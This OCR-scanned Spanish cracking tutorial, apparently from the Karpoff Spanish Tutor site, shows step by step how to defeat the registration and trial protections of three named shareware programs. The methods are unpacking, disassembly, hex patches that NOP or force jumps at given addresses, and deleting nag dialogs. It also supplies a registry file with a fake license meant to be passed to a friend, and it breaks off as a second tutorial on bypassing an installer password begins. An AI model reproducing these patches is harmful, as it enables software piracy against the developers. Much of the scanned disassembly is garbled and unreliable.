elegidos, en parte por azar y en parte porque la utilidad o calidad del programa (bajo mi punto de vista) no 
justifican la inversión de tiempo necesaria para aplicarles un "tratamiento" más conveniente. 


AL ATAKE 


Programa: YATS32 Versión 8.1 (Build 15) 


Este programa sincroniza la hora de nuestro ordenador con unos 


Descripcion: ¿ ; 
P relojes que deben ser la hostia. 


DOWNLOAD: http://www.dillobits.com/ 


Cuando arrancamos el programa, nos saluda una "preciosa" nag que nos dice que tenemos 30 días por delante para 
registrarnos o dejar de utilizarlo, y nos da la posibilidad de introducir el serial number correspondiente o de evaluar 
el programa. En este caso, trataremos de parchearlo para que parezca registrado. 


About YATS32 


Lo primero que debemos hacer es utilizar el file insPEctor para saber con qué nos encontramos. Y nos encontramos 
con que el programa está compilado con Neolite 2.0. El siguiente paso lo daremos con el ProcDump. Ejecutaremos el 
ProcDump -> Unpacker -> Neolite2 y ya está. Salvamos el programa descomprimido como Yats.exe, e intentamos 
abrirlo con el W32Dasm. El resultado es: 


Volvemos al ProcDump y seguimos los pasos siguientes: PE Editor -> Choose Executable: Yats -> Sections, y 
vemos lo siguiente: 


Sections Editor 


+ 00034000 00001000 OOO33EB0 00001000 Co0D00s0 
0000D 000 00035000 DODOCDE4 00035000 40000080 
00010594 00042000 000182BC 00042000 Co000040 


ODODEB50 ODOSFO00 DODOESC8 00058000 40000040 
00006260 ODO6E£ 000 000047D4 00064000 EDODOD20 
00002000 00075000 00002000 DODEFODO Co0b0040 


A continuación, transcribo una parte de "Descabezando archivos ejecutables portables" de nuMIT_or donde se 
explica el significado de la numeración del campo Characteristics: 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos 
inicializados o no inicializados, si se puede escribir y leer sobre la sección, si es ejecutable, si es compartible, etc. 


PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las equivalencias: 


- 000000020h __ Código. 

- 0O0000040h __Datos inicializados. 

- 000000080h __ Datos no inicializados. 

- 040000000h __ Sección cacheable. 

- 080000000h __ Sección paginable. 

- 100000000h __Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Así pues, debemos cambiar el valor de la sección .text, CODOOOSO por un valor que nos permita acceder al código del 
programa, o mejor aún, un valor que nos dé "licencia para matar", como E0000020. (botón derecho -> Edit section) 
Sobre este tema, también es recomendable consultar "Cracking desde cero para súper newbies 8", un excelente 
trabajo de DeK_OIN. 


Ahora el W32Dasm nos revelará los secretillos del programa sin ningún problema. Podemos empezar por las 
referencias a "REGISTERED TO", "30 DAY EVALUATION", "EVALUATION PERIOD EXPIRED", las cuales 
nos conducirán al meollo de la cuestión. Si seguimos los pasos entre estas referencias tendremos a la vista el código 
que determina sí estamos registrados o no, y en este caso los días que nos quedan: 


* Possible Reference to String Resource ID=00604: comments Odillobits.com 


:0040125D 685C020000 push 0000025C 

:00401262 8D8E24020000 lea ecx, dword ptr [esi+00000224] 
:00401268 E8A2A30200 call 0042B60F 

:0040126D 391DC8AD4500 cmp dword ptr [0045ADC8], ebx 
:00401273 747C je 004012F1 


Mediante esta comparación, el programa determina si estamos registrados o no. Para lo que queremos hacer, será 
suficiente con "nopear" el salto, pero vamos a echar un vistazo al resto. 


:00401275 8DBE1C020000 lea edi, dword ptr [esi+0000021C] 


* Possible StringData Ref from Data Obj ->"Registered to " 


:0040127B 6820214400 push 0044212C 

:00401280 8BCF mov ecx, edi 

:00401282 E817A10200 call 0042B39E 

:00401287 8D45EC lea eax, dword ptr [ebp-14] 
:0040128A B960A44500 mov ecx, 0045A460 

:0040128F 50 push eax 

:00401290 E862030000 call 004015F7 

:00401295 8B00 mov eaX, dword ptr [eax] 
:00401297 8D8D68FEFFEFEF lea ecx, dword ptr [ebp+FFFFFF68] 
:0040129D 51 push ecx 

:0040129E 50 push eax 

:0040129F C645FCO1 mov [ebp-04], 01 

:004012A3 E8E4000000 call 0040138C 

:004012A8 59 pop ecx 

:004012A9 885DFC mov byte ptr [ebp-04], bl 
:004012AC 59 pop ecx 

:004012AD 8D4DEC lea ecx, dword ptr [ebp-14] 
:004012B0 E8ACIFO200 call 0042B261 

:004012B5 8D8568FEFEFEFEF lea eax, dword ptr [ebp+FFFFFF68] 
:004012BB 8BCF mov ecx, edi 

:004012BD 50 push eax 

:004012BE E813A20200 call 0042B4D6 


* Possible StringData Ref from Data Obj ->"Using a copy not registered to " 
=>"you is illegal." 


:004012C3 6830214400 push 0044213C 


:004012C8 8D8E2C020000 lea ecx, dword ptr [esi+0000022C] 
:004012CE E8CBA00200 call 0042B39E 

:004012D3 53 push ebx 

:004012D4 8D8EA4010000 lea ecx, dword ptr [esi+000001A4] 
:004012DA E8A0970200 call 0042AA7F 


* Possible StringData Ref from Data Obj ->"0k" 


:004012DF 686C214400 push 0044216C 

:004012E4 8D8E30010000 lea ecx, dword ptr [esi+00000130] 
:004012EA E8D8960200 call 0042A9C7 

:004012EF EB66 jmp 00401357 


Salto a la ejecución normal del programa. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401273(C) 


:004012F1 A10CA54500 mov eaxX, dword ptr [0045A50C] 
:004012F6 8B1510A54500 mov edx, dword ptr [0045A510] 
:004012FC 8BC8 mov ecx, eax 
:004012FE OBCA or ecx, edx 
:00401300 7512 jne 00401314 


Que cosa más rara, he puesto en marcha la máquina del tiempo y, por más días que pasen, este salto no se llega a 
producir. Por lo tanto, el programa siempre nos indicará lo de los 30 días, sin que llegue a decir que el 
periodo de evaluación ha terminado, ni que llevamos tantos o cuantos días. 


* Possible StringData Ref from Data Obj ->"30 DAY EVALUATION" 


:00401302 6870214400 push 00442170 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401340 (U) 


:00401307 8D8E1C020000 lea ecx, dword ptr [esi+0000021C] 
:0040130D E88CA00200 call 0042B39E 
:00401312 EB43 jmp 00401357 


Salto a la ejecución normal del programa. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401300(C) 


:00401314 53 push ebx 

:00401315 8BF8 mov edi, eax 

:00401317 8955EC mov dword ptr [ebp-14], edx 
:0040131A E84F450100 call 0041586E 

:0040131F 59 pop ecx 

:00401320 2BC7 sub eax, edi 

:00401322 1B55EC sbb edx, dword ptr [ebp-14] 
:00401325 53 push ebx 

:00401326 6880510100 push 00015180 

:0040132B 53 push ebx 

:0040132C 52 push edx 

:0040132D E86E7C0100 call 00418FA0O 

:00401332 6A1E push 0000001E 

:00401334 59 pop ecx 


Bonita manera de poner en ECX los 30 días. ¿Será para despistar? 


:00401335 2BC8 sub ecx, eax 
:00401337 3BCB cmp ecx, ebx 


:00401339 7F07 jg 00401342 


* Possible StringData Ref from Data Obj ->"EVALUATION PERIOD EXPIRED" 


:0040133B 6884214400 push 00442184 
:00401340 EBC5 jmp 00401307 


Este salto nos llevaría a la ejecución del programa sin limitación alguna, pero eso sí, con el letrerito destinado a 
sacarnos los colores ;0) 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401339(C) 


:00401342 51 push ecx 
:00401343 8D861C020000 lea eax, dword ptr [esi+0000021C] 


* Possible StringData Ref from Data Obj ->"Sd DAY EVALUATION" 


:00401349 68A0214400 push 004421A0 
:0040134E 50 push eax 
:0040134F E834470200 call 00425A88 
:00401354 83C40C add esp, 0000000€C 


Nos unimos aquí a los otros saltos incondicionales para la ejecución del programa. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :004012EF (U), :00401312(U) 


:00401357 53 push ebx 
:bla bla bla 


Como hemos dicho más arriba, bastará con "nopear" el salto en 401273 para que estemos medio registrados. Lo 
hacemos utilizando un editor hexadecimal, en mi caso el UltraEdit-32, y ejecutamos el programa. 


About YATS32 


¿Que ha sucedido? Por un lado se ha creído que estabamos registrados (Registered to), pero no ha encontrado nuestro 
nombre, por lo que nos advierte sobre lo ilegal de nuestra actuación (Using a copy...). Finalmente se ha desactivado 


el botón de registrarse y se ha cambiado el texto del botón de evaluar el programa. También podemos ver en segundo 
término como el programa continúa "Unregistered". Tampoco me gusta lo de informar como registrarnos ¿para qué? 
Pasaremos pues al trabajo de maquillaje :0) 

Recurriremos de nuevo al editor hexadecimal y buscaremos el texto "using a copy" y lo substituiremos por nuestro 
nombre. No debemos olvidar el poner 00 al final del nombre para que el programa sepa que no hay más caracteres. 
También buscaremos "Hit Fl for" y substituiremos la H (48) por 00. A continuación, buscamos "unregistered", pero 
esta vez sin éxito. Que no cunda el pánico, debe estar en formato ancho. Así buscaremos el código: 
"55006e0072006500" (U.n.r.e.) y ahora sí. 

Después de substituir "- Unregistered" por espacios, el aspecto final es el siguiente: 


1] About YATS32 


MEBISTErS 


El resultado no está mal, pero la verdad es que hemos procedido con la delicadeza de un elefante en una cacharrería. 


Programa: Astronómica Versión 1.51 


Programa para ver los planetas, estrellas etc, sin necesidad de 


Descripcion: 
asomarse a la ventana. 


DOWNLOAD : http: //ww.astronomica.com/ 


En este caso, también nos aparece la nag de rigor que nos recuerda que el programa no es gratuito y que si a los 30 
días no hemos decidido pagar, deberemos borrar el programa de nuestro hard disk. Deben estar de broma :0) 


Astronomica is not free software. It is 
commercial product distributed as 
SHAREWARE. You are free to evaluate ¡it for 
30 days period, after which you must either 
pay for it or delete ¡it frorn your hard disk, 


There are 30 days left in the evaluation period 


Thank you for supporting shareware! 


¿Que sucedería si utilizamos la máquina del tiempo y adelantamos el calendario un mes? Pues eso: 


Astronomica 


30-day evaluation period has expired | 
Astronomica will run in demo mode. 


Digamos de paso que el demo mode es una versión muy capada del programa. Ahora ya sabemos como las gasta el 
programa. Es el momento de actuar :0) El primer paso es ir a registrarse, introducir un número cualquiera y tomar 
nota de lo que sucede, así nos encontramos con esto: 


Astronomica 


A This serial number is incorrect. Unable to unlock | 


Después de comprobar que el programa no está comprimido, ni tiene nada raro :0) podemos pasar directamente al 
W32Dasm. Empezaremos por buscar en String Data Ref. el texto "This serial number...” y llegaremos a este punto: 


:00403EE5 837D8400 cmp dword ptr [ebp-7C], 00000000 
:00403EE9 751E jne 00403F09 
:00403EEB 8B8D58FFFEFEF mOv ecx, dword ptr [ebp+FFFFFF58] 
:00403EF1 E8EC010400 call 004440E2 
:00403EF6 6A00 push 00000000 
:00403EF8 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"This serial number is incorrect. " 
->"Unable to unlock ! " 


:00403EFA 68644B4700 push 00474B64 
:00403EFF E88CB90400 call 0044F890 
:00403F04 E9CDO00000 jmp 00403FD6 


Vemos que para que acepte nuestro número chungo, debemos forzar el salto en 403EE9. Tomamos nota del offset de 
dicha posición y echamos mano del UltraEdit u otro editor hexadecimal. Aquí substituiremos 75 por EB es decir: 
JNE por JMP. Arrancamos de nuevo el programa, nos registramos y: 


Astronomica EZ 


MN You have successfully unlocked Astronomica | 


Restart it to obtain the full version. 


Ya sabemos que la alegría en casa del pobre dura poco, por eso no nos sorprende que al arrancar de nuevo, aparezca 
la nag de los días que quedan o la de periodo expirado.¿Qué hemos conseguido entonces? Pues si vamos a Help -> 
About ... veremos que donde antes decía "30-day evaluation copy" o "interactive demo mode", ahora aparecen 
nuestro nombre y el número de registro que hemos utilizado. Como podéis observar, este programa puede servir 
además como práctica agenda para guardar un par de números de teléfono. Algo es algo... :o] 


About Astronomica... 


ASTRONOMICA SHAREWARE 
Version 1.51 
Copyright O 1998 Piotr Czerski 


Licensed to Caos reptante 
Serial 6712-34567-9312-34567 


¿Y ahora qué? De nuevo recurrimos al W32Dasm y buscamos "Interactive demo mode" y "30-day evaluation copy” 
a ver que pasa. Llegamos a una bifurcación de caminos: 


:00402E91 833D28B0470000 cmp dword ptr [0047B028], 00000000 
:00402E98 7412 je 00402EAC 


Possible StringData Ref from Data Obj ->"Interactive demo mode" 


:00402E9A 68844A4700 push 00474A84 

:00402E9F 8B4DE8 MOV ecx, dword ptr [ebp-18] 
:00402EA2 83C15C add ecx, 0000005€ 

:00402EA5 E895230400 Call 0044523F 

:00402EAA EB10 jmp 00402EBC 


Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00402E98 (C) 


* Possible StringData Ref from Data Obj ->"30-day evaluation copy" 


:00402EAC 689C4A4700 push 00474A9C 

:00402EB1 8B4DE8 mov ecx, dword ptr [ebp-18] 
:00402EB4 83C15C add ecx, 0000005C 

:00402EB7 E883230400 call 0044523F 


Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00402E8F (U), :00402EAA (U) 

:00402EBC B934B04700 mov ecx, 0047B034 

etc. etc 


Podemos ver que la única diferencia entre un camino y otro está en los push de 402E9A y 402EAC, que hacen 
referencia a las cadenas de texto correspondientes. Luego, los dos caminos se encuentran en 402EBC. Por lo tanto no 
nos serviría de nada alterar el salto en 402E98, ya que esto sólo sirve para cambiar el texto de la ventana de arriba, 
cosa que ya hemos conseguido de otra manera. En cambio, es interesante tomar nota de la comparación entre el 
contenido de la posición 47B028 y 0. 

El paso siguiente podría ser buscar la cadena "30-day evaluation period has expired". Si lo hacemos, veremos esto: 


:00401C18 E8A3370000 call 004053C0 

:00401C1D 833D28B0470000 cmp dword ptr [0047B028], 00000000 
:00401C24 741A je 00401C40 

:00401C26 C7052CB0470000000000 mov dword ptr [0047B02C], 00000000 
:00401C30 6A00 push 00000000 

:00401C32 6A10 push 00000010 


* Possible StringData Ref from Data Obj ->"30-day evaluation period has expired " 


=>" ! " 
:00401C34 68EC414700 push 004741EC 
:00401C39 E852DC0400 call 0044F890 
:00401C3E EB48 jmp 00401C88 


Aquí vemos de nuevo la comparación entre el contenido de 47B028 y 0. Esto nos permite deducir que el programa 
entra en demo mode cuando encuentra un valor distinto de cero en esta posición. Así pues, si cuando arranca el 
programa, en esta posición hay un cero, habrá un momento en que, cuando el programa determina que ha 
transcurrido el tiempo de evaluación, coloca un 1 en esta posición. Vamos a pillar al programa "in fraganti". Para 
esto recurriremos al Softlce. Ejecutaremos el Symbol Loader y cuando entre el Softlce, pondremos un breakpoint: 
bpm 47b028 w. Pulsamos F5 para que continue la ejecución del programa y nos detenemos en la posición 401A71. 
Tomamos nota, salimos del programa, volvemos al W32Dasm y observamos los alrededores: 


* Reference To: ADVAPI32.RegCloseKey, Ord:0117h 


:00401A37 FF158C074800 Call dword ptr [0048078C] 

:00401A3D 8D8D18FEFFEF lea ecx, dword ptr [ebp+FFFFFE18] 
:00401A43 E848300000 call 00404A90 

:00401A48 898520FEFFEF mov dword ptr [ebp+FFFFFE20], eax 
:00401A4E BA1E000000 mov edx, 0000001E 

:00401A53 2B9520FEFFEF sub edx, dword ptr [ebp+FFFFFE20] 
:00401A59 89151CB04700 mov dword ptr [0047B01C], edx 
:00401A5F 83BD20FEFFFF1E cmp dword ptr [ebp+FFFFFE20], 0000001E 
:00401A66 7F0O9 jg 00401A71 

:00401A68 83BD20FEFFFEFOO cmp dword ptr [ebp+FFFFFE20], 00000000 
:00401A6F 7DOA jge 00401A7B 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401A66 (C) 


:00401A71 C70528B0470001000000 mov dword ptr [0047B028], 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00401834(C), :00401A6F (C) 


:00401A7B 83BD48FEFFFFOO cmp dword ptr [ebp+FFFFFE48], 00000000 


Aquí podemos ver como una vez leída la fecha actual en el registro, calcula los días transcurridos y los compara con 
30 (1E). Si han transcurrido más de 30 días, salta a 401A71, donde nos pone un 1; en caso contrario, deja el O 
original. Lo primero que se nos ocurre, es simplemente evitar que el programa ponga el 1, pero pensándolo mejor, 
como vemos que los días transcurridos se calculan en el call 404A90 y se colocan en EAX, y en la posición 
EBP+FFFFFEQ20, es más limpio y prudente hacer que EAX al regreso del call esté a O. Veamos el call: 


* Referenced by a CALL at Address: 
| :00401A43 


:00404A90 55 push ebp 

:00404A91 8BEC mov ebp, esp 

:00404A93 51 push ecx 

:00404A94 894DFC mov dword ptr [ebp-04], ecx 
:00404A97 8B45FC mov eax, dword ptr [ebp-04] 
:00404A9A 8B00O mov eax, dword ptr [eax] 
:00404A9C 99 cda 

:00404A9D B980510100 mov ecx, 00015180 

:00404AA2 F7F9 idiv ecx 

:00404AA4 8BE5 mov esp, ebp 

:00404AA6 5D pop ebp 

:00404AA7 C3 ret 


No hay problema. Sólo se trata de substituir la instrucción en 404A9A por 33 CO, es decir XOR EAX. Ejecutamos de 
nuevo el programa y vemos que le quedan 30 días. Si cambiamos la fecha, veremos que le siguen quedando los 30 
días. ¡Le hemos dado la vida eterna! Ahora vamos a por la nag. Volvamos atrás, al punto en que el programa nos 
decía que había terminado el periodo de evaluación: 


:00401C18 E8A3370000 call 004053C0 

:00401C1D 833D28B0470000 cmp dword ptr [0047B028], 00000000 
:00401C24 741A je 00401C40 

:00401C26 C7052CB0470000000000 mov dword ptr [0047B02C], 00000000 
:00401C30 6A00 push 00000000 

:00401C32 6A10 push 00000010 


* Possible StringData Ref from Data Obj ->"30-day evaluation period has expired " 


=>" ! " 
:00401C34 68EC414700 push 004741EC 
:00401C39 E852DC0400 call 0044F890 
:00401C3E EB48 jmp 00401C88 


Aquí se efectúa el call a la nag de tiempo expirado, y luego salta a la ejecución normal del programa en 401C88. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00401C24 (C) 
:00401C40 83BD48FEFFFFOO cmp dword ptr [ebp+FFFFFE48], 00000000 
:00401C47 753F jne 00401C88 


Este es el camino que seguimos después de la modificación que impide que se ponga el odioso 1 en 47B028. Si 
forzamos este salto, cambiando 75 por EB, (JNE por JMP) saltaremos a la ejecución normal del programa y así 
eludiremos la nag de los días que quedan, la cual por cierto, aparece en algún lugar del call 443DF1. 


:00401C49 C7052CB0470000000000 mov dword ptr [0047B02C], 00000000 
:00401C53 C70528B0470000000000 mov dword ptr [0047B028], 00000000 
:00401C5D 6A00 push 00000000 

:00401C5F 8D8DB4FDFFEF lea ecx, dword ptr [ebp+FFFFFDB4] 
:00401C65 E8D81A0000 call 00403742 

:00401C6A C645FC10 mov [ebp-04], 10 

:00401C6E 8D8DB4FDFFEF lea ecx, dword ptr [ebp+FFFFFDB4] 
:00401C74 E878210400 call 00443DF1 

:00401C79 C645FC0O9 mov [ebp-04], 09 

:00401C7D 8D8DB4FDFFEF lea ecx, dword ptr [ebp+FEFFFFDB4] 
:00401C83 E8282D0000 call 004049B0O 


Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 

| :00401C3E(U), :00401C47(C) 
:00401C88 C78578FDFFFFO1000000 mov dword ptr [ebp+FFFFFD78], 00000001 
bla bla bla 


Después de efectuar el cambio, el programa se ejecuta normalmente. 
Más cosas... En la barra superior del programa aparece el texto: "Astronomica 30-day evaluation copy". Eso desluce 


nuestro trabajo y vamos a quitarlo. De nuevo en el W32Dasm, buscaremos en String Date Ref, a ver que 
encontramos. 


* Reference To: USER32.GetSystemMetrics, Ord:012Ch 


:0041F83B FF15E40D4800 Call dword ptr [00480DE4] 
:0041F841 8B5508 mov edx, dword ptr [ebp+08] 
:0041F844 894214 mov dword ptr [edx+14], eax 
:0041F847 833D28B0470000 cmp dword ptr [0047B028], 00000000 
:0041F84E 740C je 0041F85C 

:0041F850 8B4508 mov eax, dword ptr [ebp+08] 


* Possible StringData Ref from Data Obj ->"Astronomica interactive demo" 


:0041F853 C74024F0644700 mov [eax+24], 004764F0 
:0041F85A EB1F ¿mp 0041F87B 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0041F84E (C) 


:0041F85C 833D2CB0470000 cmp dword ptr [0047B02C], 00000000 
:0041F863 740€ je 0041F871 
:0041F865 8B4D08 mov ecx, dword ptr [ebp+08] 


* Possible StringData Ref from Data Obj ->"Astronomica" 


:0041F868 (7412410654700 mov [ecx+24], 00476510 
:0041F86F EBOA mp 0041F87B 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0041F863(C) 


:0041F871 8B5508 mov edx, dword ptr [ebp+08] 


* Possible StringData Ref from Data Obj ->"Astronomica 30-day evaluation " 
=> "copy" 


:0041F874 C742241C654700 mov [edx+24], 0047651C 


Vemos en 41F85C la misma comparación de antes, así como el salto que nos aleja de la interactive demo. Más 
adelante, en 41 F863, vemos otro salto que nos lleva a 30-day... Debemos evitarlo substituyendo 74 OC por 90 90. Lo 
hacemos así y ejecutamos el programa sin que aparezca ninguna referencia a los 30 días. 


De hecho, ya hemos terminado. Si queremos rizar el rizo, podemos eliminar en el menú de ayuda la referencia a 
desbloquear el programa. Para esto podemos utilizar el eXeScope. En la figura, podemos ver dos menús de los que 
sólo nos interesa el 128, ya que el 178 es el de la demo capada y gracias a nuestros esfuerzos, no aparecerá jamás :0) 


+- Header 
E%- Import PF EstendediMerno T” Checked 


=- Resource 

Bitmap JT” Grayed F Hilite 
E- Menu 

128 TF Disabled TF Default 

178 - 
E: Dialog 32825 8Zenith$D9CHZ 
String :.- 32826. Natdir$09Ctl+D 
Accelerator E): 0.£Help 
E- Cursor :.. 57667.£Contents 
Icon ..- 57668,£Using Hel 
E-Wersion 
Toolbar 0 

- 57664 £4bout... 


Se trata únicamente de eliminar las referencias marcadas en color (botón derecho y delete). Aquí vemos el antes y 
después del chocolate: 


$ Contents $ Contents 
Using Help Using Help 
5%, Unlock Program... F About... 


% About... 


Eso está bien para nuestro uso. ¿Pero qué pasa si queremos pasarle el programa a un colega para que pueda evaluarlo 
con tranquilidad? ;0) No podría registrarlo a su nombre, a menos que hagamos algo para arreglarlo. Para este caso 
serviría un archivo con extensión .reg y un contenido más o menos así: 


REGEDIT4 
[HKEY_LOCAL_ MACHINENSoftwareXAstronomicalAstronomicaY1.51] 


"License"="Caos reptante" 
"ID Key"="6712-34567-9312-34567" 


Y ya tenemos dos en el saco... 


Programa: 2000th HellFire Screen Saver 
Descripcion: Salvapantallas con efectos de luz y sonido 


DOWNLOAD : http: //ww.fpsoftlab.com/products.htm 


En este tercer y último ejemplo, vamos a quemar etapas, porque me estoy alargando demasiado y sólo se trata de 
mostrar el funcionamiento del programa Resource Hacker. Así pues, voy a limitarme a mostrar los cambios que hay 
que hacer -sin explicar el por qué de dichos cambios- antes de utilizar dicho programa. 


En primer lugar, al ejecutar el programa éste nos saluda alegremente: 


HELLFIRE ES | 


This program is "try-before-pou-buy" software, Le. pou can use this fully-functional 
evaluation copy during 5-days trial period [5 days left!) 
If you: 
- Like this program: 
- Want to still use it after trial period: 
- Want to support author's future developments; 
- Wéant to get rid of reminders like this; 


PLEASE register your copy of HellFIRE screensaver! 
[Press "Yes" to open Registration Dialog) 


Si seguimos el funcionamiento del mismo, veremos que hay que cambiar este salto: 


:00402692 E819020000 call 004028B0 
:00402697 85C0 test eax, eax 
:00402699 0F85A7000000 jne 00402746 


Para esto, substituiremos OF 85 (JNE) por 90 (NOP) y E9 (JMP). Sin embargo, al ejecutar el programa nos 
encontramos con un nuevo tropiezo: 


HELLFIRE 


¿N Executable file is damaged [or ckracked]l 


¡Otro programa listillo! Además no sabe ni siquiera escribir cracked. Lamentable :o( Ya sabemos lo que hay que 
hacer... 


:00402237 85C0 test eax, eax 
:00402239 7511 jne 0040224C 
:0040223B 50 push eax 
:0040223C 50 push eax 


* Possible StringData Ref from Data Obj ->"Executable file is damaged (or " 
=>"ckracked)!" 


:0040223D 6880724200 push 00427280 


Cambiaremos 75 (JNE) por EB (JMP) y nos olvidamos del asunto. Volvemos a hacer la modificación y ya no nos 
sale la nag del inicio, pero cuando se activa el salvapantallas nos vuelve a aparecer. De nuevo se impone un cambio... 


:004022FA E8B1050000 call 004028B0 
:004022FF 85C0 test eax, eax 
:00402301 0F85C6000000 jne 004023CD 


Como anteriormente, cambiamos OF 85 por 90 E9. Ahora se vuelve a activar el salvapantallas y ... AARGH!! 


Unregistered Copy. 


(for Evaluation purposes only) 


Please 


register to: 


- Get rid of these signs 
- Get FREE tech support 
- Get FREE newsletters about new 
FP Software Lab products. | 


- Get FREE registration of future versions! 
- Support author's future developments... 


Thank You. 


He aquí lo que nos aparece en medio de la pantalla. Permanece durante 7 segundos, desaparece, y se vuelve a activar 
al cabo de otros 10. No voy a hacer los comentarios que me pide el cuerpo porque no me gusta insultar ni blasfemar 
por escrito, pero sí quiero manifestar mi más enérgica repulsa ante una actitud tan desmesurada y fuera de lugar :o( 
Cuando ataqué el programa, conseguí eliminar la nag, pero debió quedar algún bucle que hacía que se detuviera la 
ejecución del programa durante medio segundo o así. Lo dejé estar de momento, pero entonces se me ocurrió probar 
con el Resource Hacker, y he aquí el resultado: 


KE Resource Hacker - E:A0Hellfire.ser 


File 


+) [+] 


+ 


+ 4-4 


+ 


Edit 


(3 Icon 
Ey Dialog 


Ea 130 
A 136 
(a 138 
11 
145 
A 116 
Ez 147 


View 


Action Help 


$ 1049 


Fa an721 


B| 
+ 


í 1 
ms Hacker 


W'in32 Error. Code: 87. 
El parámetro no es correcto. 


ONT | DS_CENTER | W3_ 


CONTROL 146, -1, STATIC, 355 BITMAP | S55_REALS 
CONTROL "Register Novw!", 1, BUTTON, BS_DEFPUS 


Efectivamente, buscamos en Dialog y aunque nos da un error, ya hemos identificado el objetivo. Ahora utilizamos el 
botón derecho del ratón y: 


E String” 


m Fa Cureor 


eme 


Save all resources... 


Save [ Dialog ] resources ... 


Save resource... 


Delete [Dialog : 147] 


* CONTROL 146, -1, STATIC, S55_BITMAP | S55_REALS 
CONTROL "Register Now!", 1, BUTTON, BS_DEFPUS 


Lo borramos y es como si la nag no hubiera existido jamás :0) 

Nos queda algún detalle por pulir. Hay que eliminar en About toda referencia a que el programa no está registrado. 
De nuevo en el Resource Hacker vamos a Dialog 138 y eliminamos el texto marcado en cyan y modificamos a 
nuestro gusto los marcados en amarillo. 


FONT 53, "MS Sans Serif" 
í 


CONTRO] On-line Registration 1019, BUTTON ES DEFPUSHBUTTON BS 
CONTROL " 2000th HellFIRE Screen Saver v2.221n Copyright 1997-2000 Che 
CONTROL 129, -1, STATIC, 55 BITMAP | WS_CHILD | US VISIBLE, 4, 5, 105, 
CONTROL "This computer program is protected by copyright law and intern 
CONTROL "Registered To:", -1, BUTTON, BS _GROUPBOX | WS_CHILD | US _VISIB 
CONTROL "User Name:", -1, STATIC, SS5_RIGHT | WS_CHILD | WS_VISIBLE | US 
CONTROL "Company:", -1, STATIC, 55 RIGHT | WS_ CHILD | WS VISIBLE | US_G 
CONTROL "Registration Key:", -1, STATIC, SS_RIGHT | WS_CHILD | US _VISIB 
CONTROL ' ', 1023, STATIC, SS_LEFT | WS_CHILD | US_VISI 
CONTROL ", 1024, STATIC, SS_LEFT | WS_CHILD 
CONTROL , 1025, STATIC, SS_LEFT | WS_CHILD | WS_VISI 
CONTROL "", -1, STATIC, 35 ETCHEDVERT | US_CHILD | US VISIBLE, 79, 88, 
CONTROL "lNarning:", -1, BUTTON, BS_GROUPBOX | WS3_CHILD | WS VISIBLE, 2, 
CONTROL " Contact Us: in E-Mail: hellfireffpsoftlab.com:in Veb: htt 
CONTROL "HellFire Web Page..."”, 1028, BUTTON, BS_PUSHBUTTON | W3S_CHILD 


CONTROL "E-Mail Author...", 1029, BUTTON, BS_PUSHBUTTON | WS3_CHILD | VS 
CONTROL "29 2222222222 222222 2 2222222 22222222222 2222 222222222 22 2 


IEA Dialog - 138 


2000th HellFIRE Screen Saver v2.22 
CopyrightS 1997-2000 Chekalin Igor, 
FP Software Lab. 


Contact Us: En 
E-Mail: hellfire(Mpsoftlab.com: 
Web: http: ¿A fpsoftlab.com 


HellFire web Page... | — E-Mailá4uthor.... | 


Tí, "2000th HellFIRE (v2.22)]" 
e "Settings" 
El , "About ££ ] o Register" 


4, "This program is 1"try-before-you-buyl" software, i.e. you can use t 


5, "https:¿¿uww.regnow.com/fsoftsell'nph-softsell.cgi?item=3505-1" 
ó6, "You name and registration code do not match.|nPlease check you name 
5. "Can't save settings to registry because of unknown error." 


3, "http: vww.fpsoftlab.con" 


[UNREGISTERED]" 


10, "-- Registered to $s"” 


He aquí el resultado final. 


2000th HellFIRE (v2.22] 


¿Valía la pena tanto esfuerzo? Tal vez no, pero ya está hecho y no ha quedado del todo mal. 

Yo siempre ando un poco retrasado de noticias y no conocía la potencia del Resource Hacker. Si alguien está tan 
desinformado como yo, sepa que puede bajarse el programa de la página de karpoff. 

Y este es el fin de nuestra tercera víctima :0) 


No creo que el "tratamiento" que le he dado a estos programas sea el más adecuado. Incluso he llegado a 
dar voluntariamente soluciones distintas a problemas iguales. Sin embargo, creo haber cumplido el 
objetivo que me había propuesto. 

Bueno, pues creo que esto es todo. Os recuerdo que si queréis utilizar alguno de estos programas 
regularmente, debéis pagar por él, porque si no lo hacéis así, los programadores dejarán de hacer 
programas shareware y entonces nos vamos a tener que dedicar a resolver los crucigramas de los 
periódicos :o( 


Mi dirección de e-mail es: caos_reptante Ohotmail.com 


Para terminar, un saludo a los que hayáis tenido la paciencia de llegar hasta aquí :o) 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Train Dispatcher v3.1B 

PROTECCION: Password. 

Objetivo: Buscar el password a un installshield. 

Descripcion: Programa de trenes 

Dificultad: Novato 

DOWNLOAD : http://www.signalcc.com/train3/td31b.exe 

Herramientas: Softice 

CRACKER: Pedrolas N*18 FECHA: 22/03/2001 
INTRODUCCION 


Hola de nuevo, amigos. 
Esta vez le ha tocado el turno a 


Train Dispatcher v3.1B 


Un programa para jugar a manejar lineas de tren. 


AL ATAKE 


Nada mas arrancar el programa nos encontramos con la tipica ventana de 
installshield en la que nos pide un password para poder continuar con la 
instalación, pues bien este es nuestro objetivo. Tambien hay que decir que si 
seguimos los pasos utilizados en este manual, tambien se podrá encontrar el 
